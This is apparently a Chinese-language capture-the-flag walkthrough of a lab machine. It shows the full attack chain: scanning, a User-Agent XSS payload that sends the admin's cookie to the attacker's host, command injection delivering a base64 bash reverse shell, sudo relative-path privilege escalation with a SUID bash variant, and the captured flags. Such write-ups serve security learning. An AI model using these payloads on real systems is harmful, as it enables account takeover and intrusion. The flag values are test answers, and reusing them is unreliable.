Tools
https://github.com/MartinxMax/MDOG
针对XXS攻击
Main
$ nmap -sC -sV 10.10.11.8 --min-rate 1000
类似于留言板
通过目录扫描,发现一个仪表盘
$ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
回到留言板
说IP已经被记录,那么我们尝试在数据包中的User-Agent字段注入js语句
管理员不过一会就中xss了
运行,复制payload,burp重放
<img src=1 onerror=window.open("http://10.10.14.25:9999/?id="+document.cookie)>
修改cookie
http://10.10.11.8:5000/dashboard
存在RCE
$ echo "bash -i >& /dev/tcp/10.10.14.25/10032 0>&1"|base64
date=;echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==|base64%20-d>/tmp/shell.sh;chmod%20777%20/tmp/shell.sh;ls%20-al%20/tmp/shell.sh;echo%20'---------------';cat%20/tmp/shell.sh
这里面的+号需要进行url编码
date=;/bin/bash%20/tmp/shell.sh
User Flag
cat /home/dvir/user.txt
e2576236e9f7ebc8b857de1f2c10fe63
Root Flag
$ sudo -l
$ strings /usr/bin/syscheck
这个initdb.sh文件在本服务器是没有的,可以利用它
有趣的是./是一个相对路径
在app目录下执行/usr/bin/syscheck后,里的./initdb.sh指向的是app目录下的initdb.sh,而不是指向/usr/bin/下的initdb.sh
知识点:
查看当前用户在当前主机上的 sudo 权限,所列出的文件必须加sudo运行才是高权限
(~app)$ echo '/bin/bash'>initdb.sh;chomod +x initdb.sh;sudo /usr/bin/syscheck
成功提权
927acc092719872f616c53b4a0e910a9
Another
海外的大牛wp是
(~app)$ echo "chmod u+s /bin/bash" >initdb.sh;chmod +x initdb.sh;sudo /usr/bin/syscheck;/bin/bash -p
在普通用户下是无法给/bin/bash加SUID的
这里大牛的思路是利用sudo /usr/bin/syscheck执行的高权限执行initdb.sh,然后给/bin/bash添加一个SUID,这将意味着任意用户使用-p参数 privileged mode(特权模式)调用/bin/bash时候都将以root权限身份运行
我们再次返回到RCE点,发现的确如此
date=;/bin/bash%20-c%20-p%20"whoami"
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)